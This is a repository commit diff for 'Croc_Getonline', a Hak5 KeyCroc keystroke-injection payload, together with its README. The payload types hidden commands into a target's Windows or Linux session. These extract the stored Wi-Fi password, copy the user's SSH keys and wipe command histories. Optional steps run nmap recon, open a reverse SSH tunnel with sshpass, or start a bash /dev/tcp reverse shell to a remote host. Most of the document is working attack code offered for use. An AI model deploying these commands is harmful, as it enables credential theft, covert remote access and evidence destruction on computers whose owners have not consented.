hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #62 from spywill/master 

update
master
Peaks 2024-08-29 03:55:06 -04:00 committed by GitHub
parent 11f9b8d53a bd918cb98e
commit 21c450010b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
4 changed files with 574 additions and 105 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

516
payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
View File

@ -1,118 +1,468 @@
# Title: Croc_Getonline # Title: Croc_Getonline
# Description: Attempt to connect Keycroc automatically to target wifi access point # Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
# Author: spywill # Author: spywill
# Version: 3.5 # Version: 4.3
# Category: Key Croc # Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
MATCH (getonline_W|getonline_R|getonline_L) # getonline_W <-- MATCH word for windows, Attempt connection to access point
# getonline_L <-- MATCH word for Linux, Attempt connection to access point
# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
# getonline_K <-- MATCH word for killing keycroc wlan0 interface
# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
# getonline_H <-- MATCH word for entering ATTACKMODE HID
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) # option=0 Run payload as normal
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done # option=1 Run payload as normal, open terminal on target
# option=2 Run payload as normal, start reverse SSH tunnel using SSH
# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT
# option=4 Run payload as normal, open web page
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt MATCH getonline+_[A-Z]{1}
QUACK LOCK
if [ -f $wifi_pass ]; then #---> Edit payload option below
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt option=0
rm -f $wifi_pass keycroc_password=hak5croc
wifi_pass=/tools/wifipass.txt
web_page=https://forums.hak5.org/
#---> Edit remote host below
remote_user_name=EDIT_REMOTE_USERNAME_HERE
remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
port=7000
#---> Edit known SSID and password below
known_ssid=EDIT_KNOWN_SSID_HERE
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
#---> Edit recon scan on/off below & nmap
recon=off
nmap_scan="nmap -T4 -F"
recon_loot=/root/udisk/tools/Target_SSID.txt
#---> Edit ICMP/PORT alert on/off below & iptables time out
alert=off
alert_time=60
#---> Edit target password below
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
target_password=ENTER_TARGET_PASSWORD_HERE
fi fi
ATTACKMODE HID STORAGE recon_scan() {
Q DELAY 5000 if [ "$recon" = "on" ]; then
LED ATTACK if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
elif [ "$recon" = "off" ]; then
:
else
:
fi
}
ENTER_STORAGE() {
if [ -f ~/udisk$wifi_pass ]; then
cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
rm -f ~/udisk$wifi_pass
fi
ATTACKMODE HID STORAGE
QUACK DELAY 5000
LED ATTACK
}
RESET_PAYLOAD() {
QUACK UNLOCK
sleep 5 ; LED OFF
killall -9 bash
killall -9 python
sleep 1
RELOAD_PAYLOADS
}
CLEAN_UP() {
if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "history -c ; rm -f ~/.bash_history"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
}
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
}
case $LOOT in case $LOOT in
getonline_W) getonline_W)
Q GUI r ENTER_STORAGE
Q DELAY 3000 QUACK GUI r
Q STRING "powershell -NoP -NonI -W Hidden" QUACK DELAY 3000
Q ENTER QUACK STRING "powershell -NoP -NonI -W Hidden"
Q DELAY 5000 QUACK ENTER
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" QUACK DELAY 5000
Q ENTER QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
Q DELAY 3000 QUACK ENTER
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" QUACK DELAY 3000
Q ENTER QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
Q DELAY 2000 QUACK ENTER
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" QUACK DELAY 2000
Q ENTER QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
Q DELAY 2000 QUACK ENTER
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" QUACK DELAY 2000
Q ENTER QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
Q DELAY 5000 QUACK ENTER
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" QUACK DELAY 5000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_R) getonline_R)
Q CONTROL-ALT-d ENTER_STORAGE
Q CONTROL-ALT-t QUACK CONTROL-ALT-d
Q DELAY 2000 QUACK CONTROL-ALT-t
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" QUACK DELAY 2000
Q ENTER QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
Q DELAY 2000 QUACK ENTER
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" QUACK DELAY 2000
Q ENTER QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q DELAY 2000 QUACK ENTER
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" QUACK DELAY 2000
Q ENTER QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
Q DELAY 2000 QUACK ENTER
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" QUACK DELAY 2000
Q ENTER QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
Q DELAY 3000 QUACK ENTER
Q STRING "umount \$MOUNT_POINT ; exit" QUACK DELAY 3000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_L) getonline_L)
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then ENTER_STORAGE
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$target_password"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
QUACK ENTER
QUACK DELAY 3000
recon_scan
CLEAN_UP
QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;;
getonline_N)
LED B
sleep 2
echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
;;
getonline_F)
if [ -f ~/udisk$wifi_pass ]; then
LED B
sleep 2
else else
PC_PW=LINUX LED R
RESET_PAYLOAD
fi fi
Q CONTROL-ALT-d ;;
Q ALT-t getonline_K)
Q DELAY 2000 LED R
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" ifconfig wlan0 down
Q ENTER RESET_PAYLOAD
Q DELAY 2000 ;;
Q STRING "$PC_PW" getonline_S)
Q ENTER ATTACKMODE HID STORAGE
Q DELAY 2000 sleep 3
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" RESET_PAYLOAD
Q ENTER ;;
Q DELAY 2000 getonline_H)
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" ATTACKMODE HID
Q ENTER sleep 3
Q DELAY 2000 RESET_PAYLOAD
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" ;;
Q ENTER getonline_P)
Q DELAY 3000 ATTACKMODE HID SERIAL
Q STRING "sudo umount \$MOUNT_POINT ; exit" sleep 3
Q ENTER RESET_PAYLOAD
;;
getonline_A)
ATTACKMODE HID AUTO_ETHERNET
sleep 3
RESET_PAYLOAD
;;
getonline_X)
LED R
rm -f /root/udisk/payloads/Croc_getonline.txt
rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt
rm -f $recon_loot root/udisk/config.txt
rm -f /root/udisk/tools/firewall-rules-backup.txt
rm -r /root/udisk/tools/Target_SSH_KEY
apt -y remove sshpass
reboot --force
RESET_PAYLOAD
;;
getonline_T)
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
fi
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
fi
killall -9 tcpdump
sleep 1
else
:
fi
RESET_PAYLOAD
;;
*)
LED R
sleep 1
LED OFF
RESET_PAYLOAD
;; ;;
esac esac
ATTACKMODE HID
sleep 3 sleep 3
LED SETUP word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) if [[ $word_count -eq 2 ]]; then
ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
sleep 1
if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
LED SETUP
else
LED R
RESET_PAYLOAD
fi
else
LED R
RESET_PAYLOAD
fi
kill -9 $(pidof wpa_supplicant)
kill -9 $(pidof dhclient)
ifconfig wlan0 down ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then if [ "$LOOT" = "getonline_W" ]; then
sed -i '0,/./s/^.//' $wifi_pass sed -i '0,/./s/^.//' ~/udisk$wifi_pass
sed -i 's/\r//g' $wifi_pass sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
sed -i 's/\r//g' ~/udisk$wifi_pass
fi fi
sed -i 's/\( \)*/\1/g' $wifi_pass sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
dhclient wlan0
sleep 3 sleep 3
systemctl restart ssh.service systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R if : >/dev/tcp/8.8.8.8/53; then
if [ $option -eq 0 ]; then
:
elif [ $option -eq 1 ]; then
case "$LOOT" in
getonline_W)
QUACK GUI m
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 5000
;;
getonline_R)
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
;;
getonline_L)
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
;;
esac
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$keycroc_password"
QUACK ENTER
elif [ $option -eq 2 ]; then
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
[ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass
sleep 1
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
sleep 1
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 3
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
else
LED R
sleep 1
fi
elif [ $option -eq 3 ]; then
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
else
LED R
sleep 1
fi
elif [ $option -eq 4 ]; then
if [ "$LOOT" = "getonline_W" ]; then
QUACK GUI d
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Start-Process $web_page & exit"
QUACK ENTER
elif [ "$LOOT" = "getonline_R" ]; then
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
QUACK STRING "xdg-open $web_page & exit"
QUACK ENTER
elif [ "$LOOT" = "getonline_L" ]; then
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
QUACK STRING "xdg-open $web_page & exit"
QUACK ENTER
fi
else
LED FINISH
fi
LED FINISH
else
LED R
fi
if [ "$recon" = "on" ]; then
LED C SLOW
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
cat /etc/resolv.conf | grep nameserver >> $recon_loot
perform_nmap_scan() {
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
$nmap_scan $network_range >> $recon_loot
}
calculate_network_range
perform_nmap_scan
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
echo -ne "\n\n" >> $recon_loot
elif [ "$recon" = "off" ]; then
:
else
:
fi
if [ "$alert" = "on" ]; then
icmp_alert() {
calculate_network_range
sleep 1
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do
:
done
LED R SLOW
iptables -F
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
}
port_alert() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
file=/tmp/tcpdump.out
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
:
done
LED R SLOW
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
port_alert & echo -ne $! > /tmp/port_pid.txt
}
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
port_alert & echo -ne $! > /tmp/port_pid.txt
LED B
elif [ "$alert" = "off" ]; then
:
else
:
fi
sleep 3 sleep 3
LED OFF LED OFF
QUACK UNLOCK

115
payloads/library/credentials/Croc_Getonline/README.md
View File

@ -1,8 +1,9 @@
# Croc_Getonline # Croc_Getonline
## INTRODUCTION : ## INTRODUCTION :
- This project is developed for the HAK5 KeyCroc - This project is developed for the HAK5 KeyCroc.
- Attempt to connect Keycroc automatically to target wifi access point. - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel.
- Payload will use KeyCroc MATCH command to perform specific tasks.
* **TESTED ON** * **TESTED ON**
- Windows 10 - Windows 10
@ -12,29 +13,99 @@
## INSTALLATION : ## INSTALLATION :
- Enter arming mode on your keycroc to install file. - Enter arming mode on your keycroc to install file.
- Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**.
## STARTING GETONLINE : ## STARTING CROC_GETONLINE :
- After install plug into target and type in anywhere After install plug into target and type in anywhere:
- **getonline_W** <-- MATCH word for windows - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point
- **getonline_L** <-- MATCH word for Linux - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point
- **getonline_R** <-- MATCH word for Raspberry pi - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point
- When the payload is done running the LED will light up green - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD )
- Keycroc should now be connected to target wifi access point - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID
- NOTE: for linux edit payload for passwd needed for sudo permission - **`getonline_K`** MATCH word for killing keycroc wlan0 interface
- **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE
- **`getonline_H`** MATCH word for entering ATTACKMODE HID
- **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL
- **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
- **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot
- **`getonline_T`** MATCH word for Stopping ICMP/PORT alert
* **LED STATUS**
- **`LED WHITE`** Entering ATTACKMODE
- **`LED ATTACK`** Retrieving wifi access point credentials
- **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point
- **`LED GREEN`** Successful connection to wifi access point
- **`LED RED`** Payload failed
- **`LED CYAN`** Performing recon scan
- **`LED RED FLASH`** ICMP/PORT alert
**NOTE:** for linux edit payload for password needed for sudo permission.
## PAYLOAD OPTIONS :
Editing payload variable options:
- **`option=0`**
- This option will run payload as normal, attempt to connect Keycroc to wifi access point.
- **`option=1`**
- This option will run payload as normal, after a successful connection open terminal on target and start ssh session.
- ( EDIT PAYLOAD FOR KEYCROC PASSWORD )
- **`option=2`**
- This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH.
- ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" )
- SSHPASS is a requirement for this option, payload will attempt to install if not installed.
- **`option=3`**
- This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat.
- ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" )
- **`option=4`**
- This option will run payload as normal, after a successful connection open default browser and start web page.
- ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org )
* **Configuring RECON scan with recon=on and recon=off**
The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl.
- **`recon=off`**
- Suppresses active reconnaissance to maintain stealth.
- Useful for discreet scanning in sensitive environments.
- **`recon=on`**
- Initiates basic network reconnaissance scans.
- Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt.
* **Configuring ICMP and Port Alerts with alert=on and alert=off**
- **`alert=on`**
- ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules.
- Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules.
- **`alert=off`**
- If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up.
To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts.
## PAYLOAD INFO : ## PAYLOAD INFO :
**PowerShell script that performs the following actions:** - **PowerShell script that performs the following actions:**
Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet.
Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. - **Bash script that performs the following actions:**
Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
@ -42,7 +113,7 @@ Gets the password for the current wireless network by searching for the SSID in
Writes the SSID and password to a file located at $MOUNT_POINT using tee. Writes the SSID and password to a file located at $MOUNT_POINT using tee.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
**Bash script that performs the following actions:** - **Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb.
Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist.
@ -54,24 +125,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc".
**-Sed command that performs the following actions:** - **Sed command that performs the following actions:**
By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus:
1{x;s#^#sed -n 1p wifipass.txt#e;x} - 1{x;s#^#sed -n 1p wifipass.txt#e;x}
1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s 1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s
x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space.
s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only.
